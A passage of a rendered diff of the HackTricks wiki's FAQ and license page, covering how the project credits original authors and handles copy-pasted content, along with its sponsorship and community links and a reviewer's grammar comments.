* **HackTricks encourages** people to **check your page** (several people has mentioned us that since some page of them is in HackTricks they receive more visits)
|
||||||
|
|
||||||
|
However, If you still want the content of your blog to be removed from HackTricks just let us know and we will definitely **remove every link to your blog**, and any content based on it.
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
* **What should I do if I find copy-pasted content in HackTricks?**
|
* **What should I do if I find copy-pasted content in HackTricks?**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
**Unfortunatelly this practice might have happened in the beginning of the project when this page was just the notes of a pentester**. We always try to **give the original authors all the credits**. If you find a page with copy-pasted content (even with the original source referenced), let us know and we will either **remove it**, **leave the link**, or **rewrite it**.
|
We always **give the original authors all the credits**. If you find a page with copy-pasted content without original source referenced, let us know and we will either **remove it**, **add the link before the text**, or **rewrite it adding the link**.
|
||||||
|
|
||||||
## LICENSE 
|
## LICENSE
|
||||||
|
|
||||||
Copyright © All rights reserved unless otherwise specified.
|
Copyright © All rights reserved unless otherwise specified.
|
||||||
|
|
||||||
|
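Review bot: the rewritten list still carries the grammar errors of the old paragraph: `several people has mentioned us that since some page of them is in HackTricks` should be `several people have told us that since one of their pages is in HackTricks`, `making possible for more people` needs `making it possible`, and `However, If you still want` has a stray capital on `If`. The bullet `* Improve your **SEO**` should be `* Improves your **SEO**` to agree with the lead-in `Note that having links to your page in HackTricks:`. The rewritten copy-paste answer is clearer than the old one and the fix is good.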
@ -161,7 +165,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|